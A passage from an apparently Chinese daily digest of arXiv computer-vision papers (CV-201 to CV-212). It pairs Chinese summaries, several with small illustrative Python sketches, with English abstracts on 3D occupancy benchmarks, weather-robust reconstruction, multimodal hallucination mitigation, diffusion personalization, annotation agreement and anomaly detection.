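论文中的修复发生在推理阶段并带有视觉/文本双模态的混合融合;此处只演示子空间的求取与投影这一数学核心。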
[CV-201] An Instance-Centric Panoptic Occupancy Prediction Benchmark for Autonomous Driving CVPR2026
【速读】:该论文旨在解决3D全景占用预测(panoptic occupancy prediction)任务中缺乏高质量、高分辨率且具备实例级标注的物理一致数据集的问题。当前基准数据集普遍存在几何信息不完整、分辨率低以及缺少实例级注释等局限,制约了模型在精确几何重建、可靠遮挡推理和整体三维理解方面的性能提升。解决方案的关键在于构建两个核心资源:一是面向自动驾驶场景的统一高质量3D网格库ADMesh,包含超过15,000个带纹理和丰富语义标注的3D模型;二是基于CARLA模拟器生成的大规模物理一致全景占用数据集CarlaOcc,涵盖超10万帧、分辨率达0.05米的体素级实例级标注。此外,论文还提出了标准化评估指标并建立了系统性基准测试平台,为该领域的公平比较与可复现研究提供了坚实基础。
链接: https://arxiv.org/abs/2603.27238
作者: Yi Feng,Junwu E,Zizhan Guo,Yu Ma,Hanli Wang,Rui Fan
机构: Tongji University (同济大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026. Code and dataset are available at this https URL
Abstract:Panoptic occupancy prediction aims to jointly infer voxel-wise semantics and instance identities within a unified 3D scene representation. Nevertheless, progress in this field remains constrained by the absence of high-quality 3D mesh resources, instance-level annotations, and physically consistent occupancy datasets. Existing benchmarks typically provide incomplete and low-resolution geometry without instance-level annotations, limiting the development of models capable of achieving precise geometric reconstruction, reliable occlusion reasoning, and holistic 3D understanding. To address these challenges, this paper presents an instance-centric benchmark for the 3D panoptic occupancy prediction task. Specifically, we introduce ADMesh, the first unified 3D mesh library tailored for autonomous driving, which integrates over 15K high-quality 3D models with diverse textures and rich semantic annotations. Building upon ADMesh, we further construct CarlaOcc, a large-scale, physically consistent panoptic occupancy dataset generated using the CARLA simulator. This dataset contains over 100K frames with fine-grained, instance-level occupancy ground truth at voxel resolutions as fine as 0.05 m. Furthermore, standardized evaluation metrics are introduced to quantify the quality of existing occupancy datasets. Finally, a systematic benchmark of representative models is established on the proposed dataset, which provides a unified platform for fair comparison and reproducible research in the field of 3D panoptic perception. Code and dataset are available at this https URL.
[CV-202] NimbusGS: Unified 3D Scene Reconstruction under Hybrid Weather CVPR2026
【速读】:该论文旨在解决在多种混合恶劣天气条件下,从退化多视角图像中重建高质量三维场景的问题。现有方法通常针对特定天气类型设计,缺乏泛化能力;而本文提出 NimbusGS 框架,通过建模天气的双重特性——一种连续且视角一致的介质(attenuates light)导致光衰减,以及动态且视角依赖的粒子(causes scattering and occlusion)引发散射和遮挡——实现更通用的重建。其关键创新在于将退化分解为全局传输场(global transmission field)与每视图的颗粒残差(per-view particulate residuals),并引入几何引导的梯度缩放机制(geometry-guided gradient scaling),以缓解自监督优化过程中 3D 高斯表示的梯度失衡问题,从而在严重能见度下降条件下稳定学习几何结构,显著优于任务特定方法。
链接: https://arxiv.org/abs/2603.27228
作者: Yanying Li,Jinyang Li,Shengfeng He,Yangyang Xu,Junyu Dong,Yong Du
机构: Ocean University of China (中国海洋大学); Singapore Management University (新加坡管理大学); Harbin Institute of Technology (Shenzhen) (哈尔滨工业大学(深圳)); Sanya Oceanographic Institution (三亚海洋研究所)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR2026
Abstract:We present NimbusGS, a unified framework for reconstructing high-quality 3D scenes from degraded multi-view inputs captured under diverse and mixed adverse weather conditions. Unlike existing methods that target specific weather types, NimbusGS addresses the broader challenge of generalization by modeling the dual nature of weather: a continuous, view-consistent medium that attenuates light, and dynamic, view-dependent particles that cause scattering and occlusion. To capture this structure, we decompose degradations into a global transmission field and per-view particulate residuals. The transmission field represents static atmospheric effects shared across views, while the residuals model transient disturbances unique to each input. To enable stable geometry learning under severe visibility degradation, we introduce a geometry-guided gradient scaling mechanism that mitigates gradient imbalance during the self-supervised optimization of 3D Gaussian representations. This physically grounded formulation allows NimbusGS to disentangle complex degradations while preserving scene structure, yielding superior geometry reconstruction and outperforming task-specific methods across diverse and challenging weather conditions. Code is available at this https URL.
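摘要中的"几何引导的梯度缩放"意在按几何可靠性重新平衡各 3D 高斯的梯度。下面是一个高度简化的假设性草图(线性缩放、上下界取值均为示意,并非论文的具体机制):

```python
import numpy as np

def scale_gradients(grads, confidence, g_min=0.1, g_max=1.0):
    """按几何置信度对每个高斯的梯度做逐元素缩放(假设性草图)。
    grads: (N, d) 各高斯参数的梯度;confidence: (N,),取值 [0, 1]。"""
    scale = g_min + (g_max - g_min) * np.clip(confidence, 0.0, 1.0)
    return grads * scale[:, None]  # 低置信度区域的梯度被压低

grads = np.ones((3, 2))
conf = np.array([0.0, 0.5, 1.0])
scaled = scale_gradients(grads, conf)
print(scaled[:, 0])  # [0.1  0.55 1.  ]
```

直觉上,能见度严重退化的区域几何置信度低,压低其梯度可避免噪声监督主导优化,这与摘要中"缓解梯度失衡"的目标一致。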
[CV-203] EuraGovExam: A Multilingual Multimodal Benchmark from Real-World Civil Service Exams
【速读】:该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在高风险、多语言、图像基础场景下评估能力不足的问题,特别是针对公共部门考试这类具有复杂视觉结构和跨语言语境的真实任务。解决方案的关键在于构建EuraGovExam——一个源自五大欧亚地区真实公务员考试的多语言、多模态基准数据集,其中所有题目内容(包括题干、选项与视觉元素)均嵌入单一高分辨率图像中,并仅提供极简格式化指令,从而强制模型执行布局感知的跨语言推理,直接从视觉输入中提取信息。该设计显著提升了评估难度,使现有最优VLMs准确率仅为86%,有效揭示了当前模型在文化真实性、视觉复杂性和语言多样性方面的局限性。
链接: https://arxiv.org/abs/2603.27223
作者: JaeSeong Kim,Chaehwan Lim,Sang Hyun Gil,Suan Lee
机构: Semyung University (世明大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:We present EuraGovExam, a multilingual and multimodal benchmark sourced from real-world civil service examinations across five representative Eurasian regions: South Korea, Japan, Taiwan, India, and the European Union. Designed to reflect the authentic complexity of public-sector assessments, the dataset contains over 8,000 high-resolution scanned multiple-choice questions covering 17 diverse academic and administrative domains. Unlike existing benchmarks, EuraGovExam embeds all question content–including problem statements, answer choices, and visual elements–within a single image, providing only a minimal standardized instruction for answer formatting. This design demands that models perform layout-aware, cross-lingual reasoning directly from visual input. All items are drawn from real exam documents, preserving rich visual structures such as tables, multilingual typography, and form-like layouts. Evaluation results show that even state-of-the-art vision-language models (VLMs) achieve only 86% accuracy, underscoring the benchmark’s difficulty and its power to diagnose the limitations of current models. By emphasizing cultural realism, visual complexity, and linguistic diversity, EuraGovExam establishes a new standard for evaluating VLMs in high-stakes, multilingual, image-grounded settings. It also supports practical applications in e-governance, public-sector document analysis, and equitable exam preparation.
[CV-204] HD-VGGT: High-Resolution Visual Geometry Transformer
【速读】:该论文旨在解决高分辨率三维重建中因Transformer架构计算与内存开销过大,以及视觉模糊区域(如重复纹理、弱纹理或镜面表面)导致特征不稳定从而影响几何推理精度的问题。其解决方案的关键在于提出一种双分支架构HD-VGGT:低分辨率分支生成全局一致的粗略几何结构,高分辨率分支通过学习的特征上采样模块细化细节;同时引入特征调制(Feature Modulation)机制,在Transformer早期阶段抑制不可靠特征,从而提升模型在高分辨率输入下的效率与鲁棒性。
链接: https://arxiv.org/abs/2603.27222
作者: Tianrun Chen,Yuanqi Hu,Yidong Han,Hanjie Xu,Deyi Ji,Qi Zhu,Chunan Yu,Xin Zhang,Cheng Chen,Chaotao Ding,Ying Zang,Xuanfu Li,Jin Ma,Lanyun Zhu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:High-resolution imagery is essential for accurate 3D reconstruction, as many geometric details only emerge at fine spatial scales. Recent feed-forward approaches, such as the Visual Geometry Grounded Transformer (VGGT), have demonstrated the ability to infer scene geometry from large collections of images in a single forward pass. However, scaling these models to high-resolution inputs remains challenging: the number of tokens in transformer architectures grows rapidly with both image resolution and the number of views, leading to prohibitive computational and memory costs. Moreover, we observe that visually ambiguous regions, such as repetitive patterns, weak textures, or specular surfaces, often produce unstable feature tokens that degrade geometric inference, especially at higher resolutions. We introduce HD-VGGT, a dual-branch architecture for efficient and robust high-resolution 3D reconstruction. A low-resolution branch predicts a coarse, globally consistent geometry, while a high-resolution branch refines details via a learned feature upsampling module. To handle unstable tokens, we propose Feature Modulation, which suppresses unreliable features early in the transformer. HD-VGGT leverages high-resolution images and supervision without full-resolution transformer costs, achieving state-of-the-art reconstruction quality.
[CV-205] Make It Up: Fake Images Real Gains in Generalized Few-shot Semantic Segmentation
【速读】:该论文旨在解决广义少样本语义分割(Generalized Few-Shot Semantic Segmentation, GFSS)中因标注稀缺导致的新类别外观覆盖不足的问题,尤其是在掩码(mask)不可靠或缺失时,扩散模型生成的合成数据易出现覆盖不全与噪声监督的问题。其解决方案的关键在于提出Syn4Seg框架,通过两个核心机制实现:一是构建去重嵌入提示库(embedding-deduplicated prompt bank),以最大化提示空间覆盖并生成多样且类一致的合成图像;二是采用两阶段伪标签优化策略,首先过滤低一致性区域获得高精度种子,再结合全局支持集与局部图像统计信息自适应地重新标注不确定像素,最终仅对边界带和未标记像素进行约束性SAM(Segment Anything Model)更新,从而在不破坏高置信度内部区域的前提下提升边界保真度。
链接: https://arxiv.org/abs/2603.27206
作者: Guohuan Xie,Xin He,Dingying Fan,Le Zhang,Ming-Ming Cheng,Yun Liu
机构: Nankai University (南开大学); Tianjin University of Technology (天津理工大学); UESTC (电子科技大学); NKIARI (南开大学人工智能研究院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Generalized few-shot semantic segmentation (GFSS) is fundamentally limited by the coverage of novel-class appearances under scarce annotations. While diffusion models can synthesize novel-class images at scale, practical gains are often hindered by insufficient coverage and noisy supervision when masks are unavailable or unreliable. We propose Syn4Seg, a generation-enhanced GFSS framework designed to expand novel-class coverage while improving pseudo-label quality. Syn4Seg first maximizes prompt-space coverage by constructing an embedding-deduplicated prompt bank for each novel class, yielding diverse yet class-consistent synthetic images. It then performs support-guided pseudo-label estimation via a two-stage refinement that i) filters low-consistency regions to obtain high-precision seeds and ii) relabels uncertain pixels with image-adaptive prototypes that combine global (support) and local (image) statistics. Finally, we refine only boundary-band and unlabeled pixels using a constrained SAM-based update to improve contour fidelity without overwriting high-confidence interiors. Extensive experiments on PASCAL- 5^i and COCO- 20^i demonstrate consistent improvements in both 1-shot and 5-shot settings, highlighting synthetic data as a scalable path for GFSS with reliable masks and precise boundaries.
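论文中"去重嵌入提示库"的构建思想,可以用贪心余弦去重来示意:与已保留提示过于相似的候选被丢弃,以最大化提示空间覆盖。以下为假设性草图(阈值与嵌入均为玩具设定):

```python
import numpy as np

def dedup_prompt_bank(embs, threshold=0.9):
    """贪心去重:与任一已保留提示的余弦相似度超过阈值的候选被丢弃。
    embs: (N, d) 提示嵌入;返回保留提示的下标。"""
    normed = embs / np.linalg.norm(embs, axis=1, keepdims=True)
    kept = []
    for i in range(len(normed)):
        if all(float(normed[i] @ normed[j]) < threshold for j in kept):
            kept.append(i)
    return kept

embs = np.array([[1.0, 0.0], [0.99, 0.1], [0.0, 1.0]])
print(dedup_prompt_bank(embs, threshold=0.9))  # [0, 2]:第 2 条与第 0 条近似重复
```

保留下来的提示随后用于驱动扩散模型生成多样且类一致的合成图像;此处仅演示去重这一步。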
[CV-206] Understanding and Mitigating Hallucinations in Multimodal Chain-of-Thought Models CVPR2026
【速读】:该论文旨在解决多模态思维链(Multimodal Chain-of-Thought, MCoT)模型在复杂视觉推理任务中存在严重幻觉(hallucination)的问题,尤其关注其由生成过程中视觉注意力衰减所引发的错误信息编造现象。研究表明,MCoT模型的幻觉主要出现在关联推理步骤中,这一过程被作者称为“发散性思维”(divergent thinking)。解决方案的关键在于识别并定位这些发散性思维步骤,并通过干预解码过程来抑制幻觉生成,从而显著提升推理准确性。该方法简单有效,且可与现有幻觉缓解技术兼容,进一步增强整体性能。
链接: https://arxiv.org/abs/2603.27201
作者: Ji Ma,Wei Suo,Peng Wang,Yanning Zhang
机构: Northwestern Polytechnical University (西北工业大学); National Engineering Laboratory for Integrated Aero-Space-Ground-Ocean Big Data Application Technology (国家航空航天海一体化大数据应用技术工程实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:Multimodal Chain-of-Thought (MCoT) models have demonstrated impressive capability in complex visual reasoning tasks. Unfortunately, recent studies reveal that they suffer from severe hallucination problems due to diminished visual attention during the generation process. However, visual attention decay is a well-studied problem in Large Vision-Language Models (LVLMs). Considering the fundamental differences in reasoning processes between MCoT models and traditional LVLMs, we raise a basic question: Whether MCoT models have unique causes of hallucinations? To answer this question, we systematically investigate the hallucination patterns of MCoT models and find that fabricated texts are primarily generated in associative reasoning steps, which we term divergent thinking. Leveraging these insights, we introduce a simple yet effective strategy that can effectively localize divergent thinking steps and intervene in the decoding process to mitigate hallucinations. Extensive experiments show that our method outperforms existing methods by a large margin. More importantly, our proposed method can be conveniently integrated with other hallucination mitigation methods and further boost their performance. The code is publicly available at this https URL.
[CV-207] Let Triggers Control: Frequency-Aware Dropout for Effective Token Control CVPR2026
【速读】:该论文旨在解决生成式 AI(Generative AI)中文本到图像模型(如 Stable Diffusion)在个性化微调过程中因单一触发词(trigger token)与上下文频繁共现而导致的可控性差的问题,即触发词无法稳定地激发目标概念。其解决方案的关键在于提出一种无需增加参数的正则化技术——频率感知丢弃(Frequency-Aware Dropout, FAD),该方法通过共现分析识别高频耦合模式,并结合受课程学习启发的调度策略,在训练中动态抑制触发词与其周围语境的纠缠表示,从而增强触发词的语义独立性和生成可控性。
链接: https://arxiv.org/abs/2603.27199
作者: Junyoung Koh,Hoyeon Moon,Dongha Kim,Seungmin Lee,Sanghyun Park,Min Song
机构: Yonsei University (延世大学); Onoma AI
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026 P13N: Personalization in Generative AI workshop
Abstract:Text-to-image models such as Stable Diffusion have achieved unprecedented levels of high-fidelity visual synthesis. As these models advance, personalization of generative models – commonly facilitated through Low-Rank Adaptation (LoRA) with a dedicated trigger token – has become a significant area of research. Previous works have naively assumed that fine-tuning with a single trigger token to represent new concepts. However, this often results in poor controllability, where the trigger token alone fails to reliably evoke the intended concept. We attribute this issue to the frequent co-occurrence of the trigger token with the surrounding context during fine-tuning, which entangles their representations and compromises the token’s semantic distinctiveness. To disentangle this, we propose Frequency-Aware Dropout (FAD) – a novel regularization technique that improves prompt controllability without adding new parameters. FAD consists of two key components: co-occurrence analysis and curriculum-inspired scheduling. Qualitative and quantitative analyses across token-based diffusion models (SD~1.5 and SDXL) and natural language–driven backbones (FLUX and Qwen-Image) demonstrate consistent gains in prompt fidelity, stylistic precision, and user-perceived quality. Our method provides a simple yet effective dropout strategy that enhances controllability and personalization in text-to-image generation. Notably, it achieves these improvements without introducing additional parameters or architectural modifications, making it readily applicable to existing models with minimal computational overhead.
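FAD 的共现分析思想可以用一个极简草图示意:统计上下文词与触发词的共现频率,共现越频繁的词被丢弃的概率越高,而触发词本身永不丢弃。以下实现为按此直觉的假设性简化(线性概率映射与 `p_max` 均为示意,非论文的调度细节):

```python
import random
from collections import Counter

def fad_dropout(captions, trigger, p_max=0.5, seed=0):
    """频率感知丢弃的简化草图:高频共现的上下文词更可能被丢弃。"""
    cooc = Counter(w for cap in captions for w in cap if w != trigger)
    peak = max(cooc.values())
    rng = random.Random(seed)
    dropped = []
    for cap in captions:
        kept = [w for w in cap
                if w == trigger or rng.random() >= p_max * cooc[w] / peak]
        dropped.append(kept)
    return dropped

caps = [["<trig>", "girl", "smile"], ["<trig>", "girl", "hat"]]
out = fad_dropout(caps, "<trig>")
print(all("<trig>" in cap for cap in out))  # True:触发词始终保留
```

论文中还结合了受课程学习启发的调度策略来随训练动态调整丢弃强度,此处未体现。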
[CV-208] KαLOS finds Consensus: A Meta-Algorithm for Evaluating Inter-Annotator Agreement in Complex Vision Tasks CVPR2026
【速读】:该论文旨在解决当前目标检测基准测试中因标注噪声(label noise)导致的性能评估不可靠问题,即难以区分模型改进与标注误差之间的差异。其核心挑战在于现有统计指标无法有效处理视觉任务中的实例对应(instance correspondence)问题,且缺乏客观的标注一致性真值以验证新度量方法的有效性,从而迫使研究者依赖不可验证的启发式策略。解决方案的关键是提出K α LOS(KALOS),一种统一的元算法,它通过“先定位后一致性评估”的原则,将复杂的时空分类问题转化为名义可靠性矩阵;其创新之处在于基于数据驱动的方式对定位参数进行统计校准,使其能适应从边界框到体素分割或姿态估计等多种任务,并提供细粒度诊断能力(如标注者活力、协作聚类和定位敏感性),从而实现对数据集质量的标准化评估,有效区分信号与噪声。
链接: https://arxiv.org/abs/2603.27197
作者: David Tschirschwitz,Volker Rodehorst
机构: Bauhaus-Universität Weimar (包豪斯大学魏玛分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at CVPR 2026. Also known as KALOS
Abstract:Progress in object detection benchmarks is stagnating. It is limited not by architectures but by the inability to distinguish model improvements from label noise. To restore trust in benchmarking the field requires rigorous quantification of annotation consistency to ensure the reliability of evaluation data. However, standard statistical metrics fail to handle the instance correspondence problem inherent to vision tasks. Furthermore, validating new agreement metrics remains circular because no objective ground truth for agreement exists. This forces reliance on unverifiable heuristics. We propose K \alpha LOS (KALOS), a unified meta-algorithm that generalizes the “Localization First” principle to standardize dataset quality evaluation. By resolving spatial correspondence before assessing agreement, our framework transforms complex spatio-categorical problems into nominal reliability matrices. Unlike prior heuristic implementations, K \alpha LOS employs a principled, data-driven configuration; by statistically calibrating the localization parameters to the inherent agreement distribution, it generalizes to diverse tasks ranging from bounding boxes to volumetric segmentation or pose estimation. This standardization enables granular diagnostics beyond a single score. These include annotator vitality, collaboration clustering, and localization sensitivity. To validate this approach, we introduce a novel and empirically derived noise generator. Where prior validations relied on uniform error assumptions, our controllable testbed models complex and non-isotropic human variability. This provides evidence of the metric’s properties and establishes K \alpha LOS as a robust standard for distinguishing signal from noise in modern computer vision benchmarks.
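"先定位后一致性"(Localization First)原则可以用一个极简草图示意:先用 IoU 匹配不同标注者的实例,再在匹配对上统计类别一致比例。以下实现是假设性的简化(全配对阈值匹配,未做一对一匹配,也未计算完整的 Krippendorff's α):

```python
def iou(a, b):
    """轴对齐框 (x1, y1, x2, y2) 的 IoU。"""
    ix = max(0.0, min(a[2], b[2]) - max(a[0], b[0]))
    iy = max(0.0, min(a[3], b[3]) - max(a[1], b[1]))
    inter = ix * iy
    area = lambda r: (r[2] - r[0]) * (r[3] - r[1])
    union = area(a) + area(b) - inter
    return inter / union if union > 0 else 0.0

def match_then_agree(ann_a, ann_b, iou_thr=0.5):
    """先按 IoU 匹配实例,再统计匹配对上的类别一致比例(简化草图)。"""
    pairs = [(la, lb) for box_a, la in ann_a for box_b, lb in ann_b
             if iou(box_a, box_b) >= iou_thr]
    if not pairs:
        return 0.0
    return sum(la == lb for la, lb in pairs) / len(pairs)

a = [((0, 0, 10, 10), "cat"), ((20, 20, 30, 30), "dog")]
b = [((1, 1, 10, 10), "cat"), ((20, 20, 29, 29), "cat")]
print(match_then_agree(a, b))  # 0.5:两对匹配,一对类别一致
```

K αLOS 在此思路之上对定位参数做数据驱动的统计校准,并把匹配结果组织为名义可靠性矩阵以计算正式的一致性系数;此处仅演示匹配与计数骨架。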
[CV-209] MotionRFT: Unified Reinforcement Fine-Tuning for Text-to-Motion Generation
【速读】:该论文旨在解决文本驱动动作生成(text-to-motion generation)中监督预训练难以对齐高层次目标(如语义一致性、真实感和人类偏好)的问题。现有后训练方法存在三大局限:针对特定运动表示(如关节)、优化单一维度且可能损害其他因素,以及计算开销大、数据依赖强、优化粒度粗。解决方案的关键在于提出一个强化微调框架,包含两个核心组件:一是异构表示的多维奖励模型 MotionReward,通过将不同运动表示映射到由文本锚定的统一语义空间,实现多维奖励学习;二是高效细粒度微调方法 EasyTune,识别去噪步骤间的递归梯度依赖为关键瓶颈,采用逐步优化而非全轨迹优化策略,从而实现密集、细粒度且内存高效的更新。该框架在多个基准上显著提升性能,同时大幅降低显存占用。
链接: https://arxiv.org/abs/2603.27185
作者: Xiaofeng Tan,Wanjiang Weng,Hongsong Wang,Fang Zhao,Xin Geng,Liang Wang
机构: Southeast University (东南大学); Nanjing University (南京大学); Chinese Academy of Sciences (中国科学院); University of Chinese Academy of Sciences (中国科学院大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Text-to-motion generation has advanced with diffusion- and flow-based generative models, yet supervised pretraining remains insufficient to align models with high-level objectives such as semantic consistency, realism, and human preference. Existing post-training methods have key limitations: they (1) target a specific motion representation, such as joints, (2) optimize a particular aspect, such as text-motion alignment, and may compromise other factors; and (3) incur substantial computational overhead, data dependence, and coarse-grained optimization. We present a reinforcement fine-tuning framework that comprises a heterogeneous-representation, multi-dimensional reward model, MotionReward, and an efficient, fine-grained fine-tuning method, EasyTune. To obtain a unified semantics representation, MotionReward maps heterogeneous motions into a shared semantic space anchored by text, enabling multidimensional reward learning; Self-refinement Preference Learning further enhances semantics without additional annotations. For efficient and effective fine-tuning, we identify the recursive gradient dependence across denoising steps as the key bottleneck, and propose EasyTune, which optimizes step-wise rather than over the full trajectory, yielding dense, fine-grained, and memory-efficient updates. Extensive experiments validate the effectiveness of our framework, achieving FID 0.132 at 22.10 GB peak memory for MLD model and saving up to 15.22 GB over DRaFT. It reduces FID by 22.9% on joint-based ACMDM, and achieves a 12.6% R-Precision gain and 23.3% FID improvement on rotation-based HY Motion. Our project page with code is publicly available.
[CV-210] Incentivizing Temporal-Awareness in Egocentric Video Understanding Models
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在第一人称视频理解中普遍缺乏时间感知能力的问题,尤其是在依赖事件正确时序与演化推理的场景下。现有模型常因训练目标未能显式奖励时间推理,而倾向于利用帧级空间捷径(spatial shortcuts),导致对事件顺序和因果关系的理解不足。解决方案的关键在于提出一种基于可验证奖励的强化学习算法——时间全局策略优化(Temporal Global Policy Optimization, TGPO),其通过对比模型在时序有序与打乱视频帧下的输出,生成校准且全局归一化的奖励信号,从而明确激励模型进行时序一致的推理。TGPO结合GRPO和GSPO支持冷启动强化学习训练,并有效抑制现有MLLMs习得的空间捷径行为,在五个第一人称视频基准测试中显著提升时间定位精度与因果连贯性。
链接: https://arxiv.org/abs/2603.27184
作者: Zhiyang Xu,Tian Qin,Bowen Jin,Zhengfeng Lai,Meng Cao,Lifu Huang,Peng Zhang
机构: Virginia Tech (弗吉尼亚理工大学); Apple (苹果公司); UC Davis (加州大学戴维斯分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 11 pages, 4 figures
Abstract:Multimodal large language models (MLLMs) have recently shown strong performance in visual understanding, yet they often lack temporal awareness, particularly in egocentric settings where reasoning depends on the correct ordering and evolution of events. This deficiency stems in part from training objectives that fail to explicitly reward temporal reasoning and instead rely on frame-level spatial shortcuts. To address this limitation, we propose Temporal Global Policy Optimization (TGPO), a reinforcement learning with verifiable rewards (RLVR) algorithm designed to incentivize temporal awareness in MLLMs. TGPO contrasts model outputs generated from temporally ordered versus shuffled video frames to derive calibrated, globally normalized reward signals that explicitly favor temporally coherent reasoning. Integrated with GRPO and GSPO, TGPO supports cold-start RL training and effectively suppresses spatial shortcut behaviors learned by existing MLLMs. Experiments across five egocentric video benchmarks demonstrate that TGPO consistently improves temporal grounding and causal coherence, outperforming prior RL-based video reasoning approaches. Our results suggest that TGPO offers a simple and scalable pathway toward temporally robust MLLMs for egocentric video understanding.
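TGPO 的奖励构造思路——对比时序有序与打乱帧序下的模型得分,再做全局归一化——可以用如下假设性草图示意(`score_fn` 是模型打分的占位,归一化方式为常见的标准化,非论文的具体公式):

```python
import numpy as np

def tgpo_rewards(score_fn, videos, seed=0):
    """对比有序帧与打乱帧的得分之差,并做全局归一化得到奖励(草图)。"""
    rng = np.random.default_rng(seed)
    diffs = []
    for frames in videos:
        shuffled = list(frames)
        rng.shuffle(shuffled)
        diffs.append(score_fn(frames) - score_fn(shuffled))
    diffs = np.array(diffs, dtype=float)
    return (diffs - diffs.mean()) / (diffs.std() + 1e-8)  # 全局归一化

# 玩具打分:帧序越接近升序得分越高
score = lambda fs: -sum(abs(f - i) for i, f in enumerate(fs))
r = tgpo_rewards(score, [[0, 1, 2, 3], [3, 1, 0, 2]])
print(r.shape)  # (2,)
```

归一化后的奖励均值为零,使得"比打乱帧更依赖正确时序"的输出获得正向信号,与摘要中"显式偏好时序一致推理"的目标一致。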
[CV-211] Communicating about Space: Language-Mediated Spatial Integration Across Partial Views
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)是否能够像人类一样,通过自然语言对话整合不同视角的局部观测信息,从而构建一个共享的、非自我中心(allocentric)环境认知模型的问题。其解决方案的关键在于引入COSMIC基准测试平台,该平台模拟两个静态MLLM代理在3D室内环境中从不同视角观察并交换自然语言信息以解答空间查询任务,涵盖899个场景和1250个问答对,涉及五类空间推理任务。实验表明,尽管当前前沿模型(如Gemini-3-Pro-Thinking)在锚定对象识别上表现可靠,但在关系推理和全局一致地图构建方面仍接近随机水平,且缺乏有效收敛于共享心理模型的能力,这揭示了MLLMs在协同空间通信中的核心局限。
链接: https://arxiv.org/abs/2603.27183
作者: Ankur Sikarwar,Debangan Mishra,Sudarshan Nikhil,Ponnurangam Kumaraguru,Aishwarya Agrawal
机构: Mila – Quebec AI Institute (Mila –魁北克人工智能研究所); Université de Montréal (蒙特利尔大学); IIIT Hyderabad (印度国际信息技术学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Humans build shared spatial understanding by communicating partial, viewpoint-dependent observations. We ask whether Multimodal Large Language Models (MLLMs) can do the same, aligning distinct egocentric views through dialogue to form a coherent, allocentric mental model of a shared environment. To study this systematically, we introduce COSMIC, a benchmark for Collaborative Spatial Communication. In this setting, two static MLLM agents observe a 3D indoor environment from different viewpoints and exchange natural-language messages to solve spatial queries. COSMIC contains 899 diverse scenes and 1250 question-answer pairs spanning five tasks. We find a consistent capability hierarchy, MLLMs are most reliable at identifying shared anchor objects across views, perform worse on relational reasoning, and largely fail at building globally consistent maps, performing near chance, even for the frontier models. Moreover, we find thinking capability yields consistent gains in anchor grounding, but is insufficient for higher-level spatial communication. To contextualize model behavior, we additionally collect 250 human-human dialogues. Humans achieve 95% aggregate accuracy, leaving significant room for improvement for even the best performing model Gemini-3-Pro-Thinking which achieves 72% aggregate accuracy. Moreover, human conversations become increasingly specific as partners converge on a shared mental model, whereas model dialogues continue to explore new possibilities rather than converging, consistent with a limited ability to build and maintain a robust shared mental model. Our code and data is available at this https URL
[CV-212] Reasoning-Driven Anomaly Detection and Localization with Image-Level Supervision CVPR2026
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在异常检测任务中难以实现像素级定位与可解释推理的问题,尤其是现有方法依赖外部视觉模块和密集像素级标注,限制了其泛化能力与实用性。解决方案的关键在于提出一种名为“推理驱动的异常定位”(Reasoning-Driven Anomaly Localization, ReAL)的方法,通过挖掘MLLM自回归推理过程中生成的异常相关token,并聚合其注意力响应以生成像素级异常图;同时引入一致性引导的推理优化(Consistency-Guided Reasoning Optimization, CGRO)模块,利用强化学习对齐推理token与视觉注意力,从而提升推理的一致性与定位精度。该方案仅需图像级监督即可实现媲美密集标注训练方法的性能,显著推动了无需额外组件或像素标签的端到端异常检测与解释能力的发展。
链接: https://arxiv.org/abs/2603.27179
作者: Yizhou Jin,Yuezhu Feng,Jinjin Zhang,Peng Wang,Qingjie Liu,Yunhong Wang
机构: Beihang University (北京航空航天大学); Hangzhou Innovation Institute, Beihang University (杭州创新研究院,北京航空航天大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Multimodal large language models (MLLMs) have recently demonstrated remarkable reasoning and perceptual abilities for anomaly detection. However, most approaches remain confined to image-level anomaly detection and textual reasoning, while pixel-level localization still relies on external vision modules and dense annotations. In this work, we activate the intrinsic reasoning potential of MLLMs to perform anomaly detection, pixel-level localization, and interpretable reasoning solely from image-level supervision, without any auxiliary components or pixel-wise labels. Specifically, we propose Reasoning-Driven Anomaly Localization (ReAL), which extracts anomaly-related tokens from the autoregressive reasoning process and aggregates their attention responses to produce pixel-level anomaly maps. We further introduce a Consistency-Guided Reasoning Optimization (CGRO) module that leverages reinforcement learning to align reasoning tokens with visual attentions, resulting in more coherent reasoning and accurate anomaly localization. Extensive experiments on four public benchmarks demonstrate that our method significantly improves anomaly detection, localization, and interpretability. Remarkably, despite relying solely on image-level supervision, our approach achieves performance competitive with MLLM-based methods trained under dense pixel-level supervision. Code is available at this https URL.
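ReAL 的核心思路是把自回归推理中异常相关 token 对图像 patch 的注意力响应聚合为像素级异常图。下面给出一个极简的 NumPy 草图,仅演示"选取异常 token 的注意力行、取平均、重排为 patch 网格、归一化"这一聚合流程;函数名、归一化方式与网格尺寸均为演示性假设,并非论文的实际实现。

```python
import numpy as np

def anomaly_map_from_attention(attn, anomaly_token_ids, grid=(16, 16)):
    """将异常相关文本 token 对图像 patch token 的注意力聚合为粗粒度异常图。

    attn: (num_text_tokens, num_patches) 的注意力权重矩阵(假设已归一化)
    anomaly_token_ids: 被判定为异常相关的 token 行索引
    grid: patch 网格布局 (h, w),需满足 h*w == num_patches
    """
    sel = attn[anomaly_token_ids]            # 取出异常 token 对应的注意力行
    agg = sel.mean(axis=0)                   # 在 token 维度上平均聚合
    amap = agg.reshape(grid)                 # 还原为二维 patch 网格
    # min-max 归一化到 [0, 1],实际方法中的后处理可能不同
    amap = (amap - amap.min()) / (amap.max() - amap.min() + 1e-8)
    return amap
```

实际使用时还需按 patch 大小上采样到原图分辨率,这里略去。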
